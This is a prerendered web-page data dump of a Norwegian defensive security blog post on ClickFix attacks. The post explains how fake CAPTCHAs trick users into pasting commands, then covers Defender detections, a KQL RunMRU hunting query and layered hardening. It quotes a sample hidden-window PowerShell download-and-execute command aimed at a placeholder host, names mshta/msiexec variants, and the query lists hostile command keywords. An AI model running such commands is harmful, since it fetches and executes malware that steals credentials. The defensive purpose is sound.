[{"data":1,"prerenderedAt":1128},["ShallowReactive",2],{"sc:header-data-no":3,"sc:footer-data-no":489,"author-no-nadine-kern-166cee5a31dd89":519,"content-no-nadine-kern":550,"content-events-no-nadine-kern":1113,"authors_data:Fritz Zurhorst|Nadine Klein":1114},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"no":13},{"title":14,"url":15,"alt":16},"Hjem","/no","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"no":21},{"title":22,"description":23},"Workplace","Microsoft 365-drevet for smarte, sikre og fleksible arbeidsplasser som samler moderne teknologi og identitetstjenester.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"no":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"no":34},{"title":35,"url":36},"Managed Intune","/no/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"no":40},{"title":41,"url":42},"Managed Entra","/no/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"no":46},{"title":47,"url":48},"Managed Workplace","/no/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"no":52},{"title":53,"url":54},"Consulting Services","/no/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"no":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"no":64},{"title":65,"url":66},"Microsoft Entra Suite","/no/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"no":70},{"title":71,"url":72},"Microsoft Intune","/no/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"no":76},{"title":77,"url":78},"Microsoft Windows","/no/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"no":82},{"title":83,"url":84},"Windows 365 Cloud PC","/no/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"no":88},{"title":89,"url":90},"Cloud Workplace Foundation","/no/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"no":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"no":100},{"title":101,"url":102},"Microsoft 365 Copilot","/no/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"no":106},{"title":107,"url":108},"Teams","/no/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"no":112},{"title":113,"url":114},"SharePoint & Power Platform","/no/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"no":118},{"title":119,"url":120},"Exchange Online","/no/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"no":124},{"title":125,"url":126},"Information Protection & Compliance","/no/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"no":130},{"title":131,"description":132},"Azure","Driv vekst med Azure: kutt cloud-kostnader, øk effektiviteten og skap innovasjon gjennom IaaS og PaaS.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"no":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"no":142},{"title":143,"url":144},"Azure Managed Services","/no/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"no":148},{"title":149,"url":150},"Azure Consulting","/no/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"no":154},{"title":155},"Scenarier",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"no":160},{"title":161,"url":162},"Planlegg cloud-en din","/no/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"no":166},{"title":167,"url":168},"Migrer til cloud","/no/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"no":172},{"title":173,"url":174},"Forny virksomheten din","/no/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"no":178},{"title":179,"url":180},"Tenk nytt om VMware-strategien din","/no/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"no":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"no":190},{"title":191,"url":192},"Azure Foundation","/no/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"no":196},{"title":197,"url":198},"Azure AI Foundation","/no/azure/azure-ai-foundation",{"name":86,"languages":200},{"no":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"no":205},{"title":206,"url":207},"Azure Data Foundation","/no/azure/azure-data-foundation",{"name":188,"languages":209},{"no":210},{"title":211,"url":212},"Azure Container Foundation","/no/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"no":216},{"title":217,"url":218},"Managed Dark Tenant","/no/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"no":222},{"title":223,"url":224},"Cloud Adoption Framework","/no/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"no":228},{"title":229,"url":230},"Cloud Competence Center","/no/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"no":234},{"title":235,"description":236,"emergency":237},"Security","Årvåkenhet i cloud med en prisbelønt 24/7 managed service, incident response og moderne beskyttelse av infrastrukturen din.",{"text":238,"href":239,"skin":240,"icon":241},"Under angrep?","/no/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"no":249},{"title":250,"url":251},"Managed Red Tenant","/no/security/managed-red-tenant",{"name":214,"languages":253},{"no":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"no":259},{"title":260,"url":261},"Sentinel Data Lake","/no/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"no":265},{"title":266,"url":267},"Security Consulting","/no/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"no":274},{"title":275,"url":276},"Cloud Security Operations Center","/no/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"no":280},{"title":281,"url":282},"Global Secure Access","/no/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"no":286},{"title":287,"url":288},"MyWorkID","/no/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"no":295},{"title":296,"url":297},"Preventive Services","/no/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"no":301},{"title":302,"url":303},"Data Security Service","/no/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"no":307},{"title":308,"url":309},"Security Copilot Agents","/no/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"no":313},{"title":314,"url":315},"Innføre NIS2","/no/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"no":319},{"title":320,"description":321},"Produkter","Innovative tilleggsprodukter for et fullstendig sikkert, 100 % cloud-native Microsoft-miljø som styrker samarbeid, nettverksautentisering og programvarehåndtering.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"no":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","Cloud-basert programvaredistribusjon",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"no":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","Sertifikatdistribusjon fra cloud",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"no":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Jobb med dine lokale office 365-data",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"no":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","Migrer dataene dine fra én server til en annen",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"no":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Terraform Provider for Microsoft 365",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"no":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","Autentisering for nettverket ditt",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"no":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Finn kontakter i Microsoft Teams",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"no":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","Windows Autopilot-overvåking i sanntid",{"name":396,"languages":397},"casestudies",{"no":398},{"title":399,"url":400,"description":401},"Case Studies","/no/casestudies","Pioner i cloud: din fremste Microsoft-partner for omfattende cloud-løsninger med en Blueprint-basert tilnærming og Infrastructure-as-Code-kompetanse.",{"name":403,"languages":404,"children":407},"company",{"no":405},{"title":406,"description":401},"Selskap",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"no":411},{"title":412},"Om oss",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"no":417},{"title":418,"url":419},"Fakta og tall","/no/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"no":423},{"title":424,"url":425},"Kontakt og lokasjoner","/no/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"no":429},{"title":430,"url":431},"glueckkanja Sveits","/no/company/switzerland",{"name":433,"languages":434},"austria",{"no":435},{"title":436,"url":437},"glueckkanja Østerrike","/no/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"no":441},{"title":442},"Karriere",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"no":447},{"title":448,"url":449},"Karriereoversikt","/no/career",{"name":451,"languages":452},"company-young-professionals",{"no":453},{"title":454,"url":455},"Young Professionals","/no/young-professionals",{"name":457,"languages":458},"company-jobs",{"no":459},{"title":460,"url":461},"Ledige stillinger","/no/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"no":465},{"title":466},"Siste nytt",[468,474],{"name":469,"languages":470},"company-blog",{"no":471},{"title":472,"url":473},"Blogg","/no/blog",{"name":469,"languages":475},{"no":476},{"title":477,"url":478},"Arrangementer","/no/events",[480],{"name":481,"languages":482},"career-meta",{"no":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"no":487},{"title":488,"url":425,"active":484},"Kontakt",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksNo":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"Personvern","/no/privacy",{"title":514,"url":515},"Juridisk informasjon","/no/imprint",{"title":517,"url":518},"Ingen cookies","/no/cookies",{"id":520,"title":521,"body":522,"description":528,"extension":533,"meta":534,"name":535,"navigation":325,"otherLanguages":536,"path":546,"seo":547,"stem":548,"__hash__":549},"authors/nadine-kern.md","Nadine Kern",{"type":523,"value":524,"toc":529},"minimal",[525],[526,527,528],"p",{},"Nadine Klein arbeitet als Cloud Architect im Bereich Security. Sie berät Kunden bei der Planung und Umsetzung der Microsoft 365 Defender Produkte. Außerdem betreut sie unsere Kunden im Cloud Security Operations Center und ist Teil unseres APT Repsonse Teams bei kompromittierten oder verschlüsselten Kundenumgebungen.",{"title":530,"searchDepth":531,"depth":531,"links":532},"",2,[],"md",{},"Nadine Klein",{"en":537,"es":538,"sv":539,"fi":540,"da":541,"ko":542,"nl":543,"no":544,"ja":545},"Nadine Klein works as a Cloud Architect in the area of Security. She advises customers on the planning and implementation of Microsoft 365 Defender products. She also supports our customers in the Cloud Security Operations Center and is part of our APT Repsonse team for compromised or encrypted customer environments.","Nadine Klein trabaja como Cloud Architect en el ámbito de Security. Asesora a los clientes en la planificación e implementación de los productos Microsoft 365 Defender. Además, atiende a nuestros clientes en el Cloud Security Operations Center y forma parte de nuestro APT Response Team en entornos de clientes comprometidos o cifrados.","Nadine Klein arbetar som Cloud Architect inom området Security. Hon rådgiver kunder vid planering och genomförande av Microsoft 365 Defender-produkterna. Dessutom betjänar hon våra kunder i Cloud Security Operations Center och ingår i vårt APT Response Team vid komprometterade eller krypterade kundmiljöer.","Nadine Klein työskentelee Cloud Architectina Security-alueella. Hän neuvoo asiakkaita Microsoft 365 Defender -tuotteiden suunnittelussa ja käyttöönotossa. Lisäksi hän palvelee asiakkaitamme Cloud Security Operations Centerissä ja on osa APT Response Team -tiimiämme vaarantuneissa tai salatuissa asiakasympäristöissä.","Nadine Klein arbejder som Cloud Architect inden for området Security. Hun rådgiver kunder om planlægning og implementering af Microsoft 365 Defender-produkterne. Desuden betjener hun vores kunder i Cloud Security Operations Center og er en del af vores APT Response Team ved kompromitterede eller krypterede kundemiljøer.","Nadine Klein은 Security 분야의 Cloud Architect로 일하고 있습니다. 그녀는 Microsoft 365 Defender 제품의 계획 및 구현과 관련하여 고객에게 자문을 제공합니다. 또한 Cloud Security Operations Center에서 고객을 지원하며, 침해되었거나 암호화된 고객 환경에 대응하는 APT Response Team의 일원이기도 합니다.","Nadine Klein werkt als Cloud Architect op het gebied van security. Ze adviseert klanten bij de planning en implementatie van de Microsoft 365 Defender producten. Daarnaast begeleidt ze onze klanten in het Cloud Security Operations Center en is ze onderdeel van ons APT Response Team bij gecompromitteerde of versleutelde klantomgevingen.","Nadine Klein jobber som Cloud Architect innen security. Hun rådgir kunder ved planlegging og implementering av Microsoft 365 Defender-produktene. I tillegg følger hun opp kundene våre i Cloud Security Operations Center og er en del av APT Response-teamet vårt ved kompromitterte eller krypterte kundemiljøer.","Nadine KleinはSecurity領域のCloud Architectです。Microsoft 365 Defender製品の計画と導入についてお客様を支援しています。さらに、Cloud Security Operations Centerで当社のお客様を担当し、侵害されたり暗号化されたりしたお客様環境に対応するAPT Response Teamの一員でもあります。","/nadine-kern",{"title":521,"description":528},"nadine-kern","56qh4Ybfi7H4W9Itn4ADcyI2MJdu50TKarjr_ArknXo",[551],{"id":552,"title":553,"author":554,"body":556,"cta":494,"description":530,"eventid":494,"extension":533,"hideInRecent":484,"layout":1066,"meta":1067,"moment":1071,"navigation":325,"path":1105,"seo":1106,"stem":1107,"tags":1108,"webcast":484,"__hash__":1112},"content_no/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. Når brukeren er exploiten, og hvordan dere stopper det",[555,535],"Fritz Zurhorst",{"type":523,"value":557,"toc":1055},[558,563,566,569,576,584,587,593,596,615,626,632,638,641,645,647,650,653,657,659,662,676,680,682,689,768,785,788,792,794,797,812,815,818,822,824,827,830,855,859,861,864,871,875,877,880,906,909,912,915,1014,1017,1020,1023,1034,1037,1041,1043,1051],[559,560,562],"h2",{"id":561},"clickfix-angrepskjeden","ClickFix-angrepskjeden",[526,564,565],{},"{: .h3-font-size}",[526,567,568],{},"ClickFix er et angrep der brukere blir sin egen angriper. Ingen exploit, ingen sårbarhet. Offeret kjører skadekoden selv, med én eneste kopier-lim-inn.",[526,570,571],{},[572,573],"img",{"alt":574,"src":575},"ClickFix-angrepskjeden i fem trinn: agnet, trikset, kopier-lim-inn, kjøring, infeksjon.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/click-fix-img-01.png",[526,577,578,579,583],{},"Agnet er social engineering: en forfalsket CAPTCHA på en ondsinnet side, en falsk supportmelding («nettleseren din trenger en oppdatering»), en phishing-e-post eller en forfalsket møteside. Mens offeret er på siden, skriver JavaScript payloaden inn i utklippstavlen via ",[580,581,582],"code",{},"clipboard.writeText()",". Så ber siden brukeren trykke Win+R, Ctrl+V og Enter. Kjør-dialogen starter det som ligger i utklippstavlen.",[526,585,586],{},"Et typisk agn ser slik ut:",[526,588,589],{},[572,590],{"alt":591,"src":592},"Skjermbilde av et forfalsket CAPTCHA-agn som ber brukeren trykke Win og X, deretter lime inn og kjøre en kommando med Enter.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-02.png",[526,594,595],{},"Kommandoen den legger i utklippstavlen, ser slik ut:",[597,598,600],"div",{"style":599},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[601,602,606],"pre",{"className":603,"code":604,"language":605,"meta":530,"style":530},"language-powershell shiki shiki-themes github-light github-dark","powershell.exe -w h iex(irm 'https://malicious[.]tld/payload' -UseBasicParsing)\n","powershell",[580,607,608],{"__ignoreMap":530},[609,610,613],"span",{"class":611,"line":612},"line",1,[609,614,604],{},[526,616,617,618,621,622,625],{},"To ting skjer samtidig. PowerShell starter i et skjult vindu (",[580,619,620],{},"-w h","), og ",[580,623,624],{},"iex(irm …)"," laster ned payloaden og kjører den direkte i minnet. Ingenting havner på disken, signaturbasert antivirus har altså ingenting å skanne. Det andre trinnet er som regel en infostealer (Lumma, Vidar, RedLine, StealC), en Remote Access Trojan eller en ransomware-loader.",[526,627,628,629,631],{},"Det samme mønsteret i Microsoft Defender-telemetrien, en skjult PowerShell startet fra Windows Terminal som kjører ",[580,630,624],{},":",[526,633,634],{},[572,635],{"alt":636,"src":637},"Microsoft Defender-inspect-record med prosesskjeden WindowsTerminal.exe til pwsh.exe til powershell.exe som kjører en iex(irm …)-kommando.","https://res.cloudinary.com/c4a8/image/upload/c_limit,w_1600,f_auto,q_auto/blog/pics/click-fix-img-03.png",[526,639,640],{},"Hvorfor dette fungerer så godt: alt kjører i brukerkonteksten, uten forhøyede rettigheter. Cookies, lagrede passord og session-tokens ligger innenfor rekkevidden til en standardbruker. Angriperen trenger ikke eskalere rettigheter for å få tak i det han kom for.",[559,642,644],{"id":643},"hva-microsoft-defender-oppdager","Hva Microsoft Defender oppdager",[526,646,565],{},[526,648,649],{},"Microsoft har de siste månedene investert mye i ClickFix-deteksjon. Er Defender hos dere frisk og riktig konfigurert, får dere native deteksjoner for ClickFix-payloads. Siden Q2 2025 publiserer MDE atferdsbaserte alerts under titler som \"Suspicious 'ClickFix' behavior detected\", \"Malicious PowerShell command executed via Run dialog\" eller \"An active 'Pacalau' malware in a command line was prevented from executing\". De utløses fra MDE-cloud-engineen via analyse av prosesskjeden, parallelt med AV-deteksjonen og ofte noen sekunder tidligere.",[526,651,652],{},"Konfigurasjonen som gjør dette mulig, står lenger ned under herdingen av kjøringen.",[559,654,656],{"id":655},"hvor-den-native-deteksjonen-kommer-til-kort","Hvor den native deteksjonen kommer til kort",[526,658,565],{},[526,660,661],{},"Cloud-baserte ML-signaturer trenger tid før de utløses. Vi ser jevnlig et gap på over ett minutt mellom PowerShell-starten og Defender-alerten. En raskere payload glipper gjennom dette vinduet.",[526,663,664,665,667,668,671,672,675],{},"Angripere tilpasser seg dessuten raskt. Bytt ut ",[580,666,605],{}," med ",[580,669,670],{},"mshta http://..."," eller ",[580,673,674],{},"msiexec /i http://...",", begge klassiske LOLBins, og de PowerShell-spesifikke deteksjonene griper ikke lenger.",[559,677,679],{"id":678},"å-lukke-hullet-et-runmru-hunt","Å lukke hullet: et RunMRU-hunt",[526,681,565],{},[526,683,684,685,688],{},"Dette hullet lukker vi med Custom Detections. Utgangspunktet er en KQL-spørring mot registernøkkelen ",[580,686,687],{},"RunMRU",", som logger hver kommando en bruker taster inn i Win+R-dialogen.",[597,690,691],{"style":599},[601,692,696],{"className":693,"code":694,"language":695,"meta":530,"style":530},"language-kusto shiki shiki-themes github-light github-dark","DeviceRegistryEvents\n| where ActionType =~ \"RegistryValueSet\"\n| where InitiatingProcessFileName =~ \"explorer.exe\"\n| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n| where RegistryValueData has \" ✅ \"\n    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n","kusto",[580,697,698,703,708,714,720,726,732,738,744,750,756,762],{"__ignoreMap":530},[609,699,700],{"class":611,"line":612},[609,701,702],{},"DeviceRegistryEvents\n",[609,704,705],{"class":611,"line":531},[609,706,707],{},"| where ActionType =~ \"RegistryValueSet\"\n",[609,709,711],{"class":611,"line":710},3,[609,712,713],{},"| where InitiatingProcessFileName =~ \"explorer.exe\"\n",[609,715,717],{"class":611,"line":716},4,[609,718,719],{},"| where RegistryKey has @\"\\CurrentVersion\\Explorer\\RunMRU\"\n",[609,721,723],{"class":611,"line":722},5,[609,724,725],{},"| where RegistryValueData has \" ✅ \"\n",[609,727,729],{"class":611,"line":728},6,[609,730,731],{},"    or (RegistryValueData has_any (\"powershell\", \"mshta\", \"curl\", \"msiexec\", \"^\")\n",[609,733,735],{"class":611,"line":734},7,[609,736,737],{},"        and RegistryValueData matches regex \"[\\\\u0400-\\\\u04FF\\\\u0370-\\\\u03FF\\\\u0590-\\\\u05FF\\\\u0600-\\\\u06FF\\\\u0E00-\\\\u0E7F\\\\u2C80-\\\\u2CFF\\\\u13A0-\\\\u13FF\\\\u0530-\\\\u058F\\\\u10A0-\\\\u10FF\\\\u0900-\\\\u097F]\")\n",[609,739,741],{"class":611,"line":740},8,[609,742,743],{},"    or (RegistryValueData has \"mshta\" and RegistryValueName !~ \"MRUList\" and RegistryValueData !in~ (\"mshta.exe\\\\1\", \"mshta\\\\1\"))\n",[609,745,747],{"class":611,"line":746},9,[609,748,749],{},"    or (RegistryValueData has_any (\"bitsadmin\", \"forfiles\", \"ProxyCommand=\") and RegistryValueName !~ \"MRUList\")\n",[609,751,753],{"class":611,"line":752},10,[609,754,755],{},"    or ((RegistryValueData startswith \"cmd\" or RegistryValueData startswith \"powershell\")\n",[609,757,759],{"class":611,"line":758},11,[609,760,761],{},"        and (RegistryValueData has_any (\"-W Hidden \", \" -eC \", \"curl\", \"E:jscript\", \"ssh\", \"Invoke-Expression\", \"UtcNow\", \"Floor\", \"DownloadString\", \"DownloadFile\", \"FromBase64String\", \"System.IO.Compression\", \"System.IO.MemoryStream\", \"iex\", \"Invoke-WebRequest\", \"iwr\", \"Get-ADDomainController\", \"InstallProduct\", \"-w h\", \"-X POST\", \"Invoke-RestMethod\", \"-NoP -W\", \".InVOKe\", \"-useb\", \"irm \", \"^\", \"[char]\", \"[scriptblock]\", \"-UserAgent\", \"UseBasicParsing\", \".Content\")\n",[609,763,765],{"class":611,"line":764},12,[609,766,767],{},"            or RegistryValueData matches regex @\"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\\s[A-Za-z0-9+/=]{15,}\"))\n",[526,769,770,771,774,775,774,778,774,781,784],{},"Spørringen markerer hver Win+R-oppføring som ser ut som en ClickFix-kommando: PowerShell, mshta, curl eller msiexec sammen med typiske indikatorer som ",[580,772,773],{},"-w hidden",", ",[580,776,777],{},"iex",[580,779,780],{},"irm",[580,782,783],{},"DownloadString"," eller Base64-kodede payloads. Den fanger også de subtile triksene. Den grønne hake-emojien som mange forfalskede CAPTCHA-agn setter foran kommandoen. Unicode-tegn fra kyrilliske, arabiske eller thailandske områder, som angripere bruker til å kamuflere tekst og omgå enkle strengfiltre. Dukker ett av disse mønstrene opp i en Win+R-oppføring, pågår det svært sannsynlig et ClickFix-angrep akkurat nå.",[526,786,787],{},"For CSOC-kundene våre drifter vi disse og flere Custom Detections for å lukke gapet mellom nye angrepsteknikker og den innebygde deteksjonen.",[559,789,791],{"id":790},"beskyttelseslag-1-blokkere-leveransen","Beskyttelseslag 1: blokkere leveransen",[526,793,565],{},[526,795,796],{},"Nå til preventionen. ClickFix er utbredt og vellykket, en enkelt beskyttelse holder altså ikke. Vi jobber i lag, fra leveransen til kjøringen.",[526,798,799,800,803,804,807,808,811],{},"Network Protection blokkerer kjente delivery-domener og C2-servere for alle nettlesere. MDE Web Content Filtering supplerer med kategorier som \"Newly registered domains\", \"Hacking\" og \"Illegal Software\". Network Protection er innebygd i Windows, men for tredjeparts nettlesere må dere deaktivere QUIC og ECH, fordi begge krypterer hele forbindelsen og skjuler måldomenet. Deaktiver QUIC i Chrome og Firefox via enterprise-policy (",[580,801,802],{},"QuicAllowed = Disabled"," i Chrome, ",[580,805,806],{},"network.http.http3.enable = false"," i Firefox); for ECH setter dere ",[580,809,810],{},"EncryptedClientHelloEnabled = Disabled"," i Chrome.",[526,813,814],{},"For Edge aktiverer dere SmartScreen. For tredjeparts nettlesere slår dere på deres innebygde Safe Browsing. Det er ikke det samme som Network Protection, men hjelper med å filtrere skadelige sider. For e-postvektoren sjekker Safe Links og Safe Attachments lenker og vedlegg før brukere interagerer med dem.",[526,816,817],{},"Haken: alt dette virker bare mot kjent infrastruktur. Aktuelle ClickFix-kampanjer går via nyregistrert infrastruktur som identifiseres og blokkeres for sent, og noen ganger via legitime sider som en angriper har kompromittert. Så la oss se på hva som beskytter etter at agnet er levert.",[559,819,821],{"id":820},"beskyttelseslag-2-blokkere-trikset","Beskyttelseslag 2: blokkere trikset",[526,823,565],{},[526,825,826],{},"Noen Edge-funksjoner hever terskelen mens brukeren er på en ondsinnet side. Styring av nettleserutvidelser hindrer at brukere installerer ondsinnede eller kompromitterte utvidelser som smugler inn ClickFix-overlays eller selv manipulerer utklippstavlen. Edge Enhanced Security Mode legger strengere beskyttelsestiltak på ukjente og sjelden besøkte sider (JIT deaktivert, Control Flow Guard, maskinvarestøttet stackbeskyttelse), noe som gjør exploitbaserte nettleserovertakelser betydelig vanskeligere. Typo Protection advarer mot typosquattede domener (micros0ft.com, paypa1.com) og blokkerer en utbredt ClickFix-leveransevektor via forfalskede merkevaredomener.",[526,828,829],{},"Tekniske kontroller er bare halve jobben. Brukeropplæring er fortsatt avgjørende. Den ene regelen som bærer det meste: Ber en nettside deg lime noe inn i datamaskinen din, er det et angrep. Gjør det konkret i awareness-treningen:",[831,832,834,835,834,843,834,849],"ul",{"style":833},"margin: 0.25rem 0","\n  ",[836,837,838,842],"li",{},[839,840,841],"strong",{},"Vis ekte agn:"," forfalskede \"Verify you are human\"-avkrysningsbokser, \"nettleseren din trenger en oppdatering\", \"dokumentet kunne ikke rendres, kjør denne fiksen\", ødelagte Teams- eller Zoom-lydprompter.",[836,844,845,848],{},[839,846,847],{},"Demonstrer utklippstavle-trikset:"," vis hvordan siden stille overskriver utklippstavlen.",[836,850,851,854],{},[839,852,853],{},"Gjør det enkelt å melde fra:"," raskt og uten skyldfordeling.",[559,856,858],{"id":857},"beskyttelseslag-3-blokkere-handlingen","Beskyttelseslag 3: blokkere handlingen",[526,860,565],{},[526,862,863],{},"Her finnes noen muligheter for å herde systemet, ingen av dem er en garanti. Begynn med å deaktivere Kjør-dialogen, det fjerner Win+R-inngangspunktet. Microsofts ClickFix-guidance anbefaler å deaktivere den \"where it isn't necessary\". Det lukker det spesifikke Win+R-lim-inn-angrepet, men alternative startflater blir igjen, for eksempel Explorer-adresselinjen og Windows Terminal.",[526,865,866,867,870],{},"Dere kan i tillegg herde Edge med ",[580,868,869],{},"DefaultClipboardSetting",", det hindrer at JavaScript stille skriver til utklippstavlen.",[559,872,874],{"id":873},"beskyttelseslag-4-blokkere-kjøringen","Beskyttelseslag 4: blokkere kjøringen",[526,876,565],{},[526,878,879],{},"Få grunnlaget på plass før de avanserte funksjonene. For ClickFix betyr det:",[831,881,834,882,834,888,834,894,834,900],{"style":833},[836,883,884,887],{},[839,885,886],{},"Local Admin Reduction:"," fjern lokale administratorrettigheter fra sluttbrukere der det er mulig, for å begrense effekten av en kodekjøring.",[836,889,890,893],{},[839,891,892],{},"Endpoint Privilege Management (EPM):"," la brukere jobbe som standardbrukere og eleverer kun godkjente apper via policy-regler.",[836,895,896,899],{},[839,897,898],{},"UAC-herding:"," gå gjennom 